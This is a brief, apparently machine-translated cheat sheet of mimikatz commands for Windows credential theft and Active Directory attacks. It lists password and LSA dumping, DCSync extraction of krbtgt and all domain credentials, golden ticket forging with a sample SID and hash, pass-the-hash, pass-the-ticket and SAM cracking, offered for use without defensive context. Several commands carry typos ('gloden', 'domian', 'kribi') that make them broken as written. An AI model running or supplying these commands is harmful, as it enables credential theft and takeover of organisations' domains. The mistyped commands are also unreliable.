Preface
It is used under the administrator authority. If there is no administrator authority, basically every function cannot be used normally, remember.
command
Commands that can be executed by ordinary administrators (password query and permission detection and logging)
lsadump::lsa /inject can view all the details of all users
privilege::debug opens the first command and must be executed.
log The so-called output after the execution of this command is stored in the mimikatz.log file in the current directory.
sekurlsa::logonpasswords lists the passwords of logged in users (more commonly used)
Commands that can only be executed with domain control authority
lsadump::dcsync /domain:test.com /user:krbtgt Output the password information of the specified user
lsadump::dcsync /domain:test.com /all /csv List the account passwords of all users in the domain
Gold bill related
Clear and query bill information
kerberos::list lists all tickets
kerberos::purge deletes all tickets
sekurlsa::kerberos lists verified kerberos credentials (almost never used and can only be used in the domain)
sekurlsa::tickets /export lists all tickets (Basically never used and can only be used in the domain)
Make notes
Use nthash to make notes
kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-4166986646-4168497534-2490551922 /krbtgt:308390d1ca7addf22c84ba9f1d26cbe4 /ticket:1.kirbi
Use the hash value of krbtgt:
kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi
Use the aes256 value of krbtgt:
kerberos::gloden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kribi
pth attack:
sekurlsa::pth /domian:test.com /user: zhangsan /ntlm:3dbde697d71690a769204beb12283678
lsadump::dcsync /domain:test.com /all /csv
Load ticket to cache
kerberos::ptt 1.kirbi
Crack the sam file
lsadump :: sam /sam:sam.hiv /system:system.hiv
Refer to
how to use mimikatz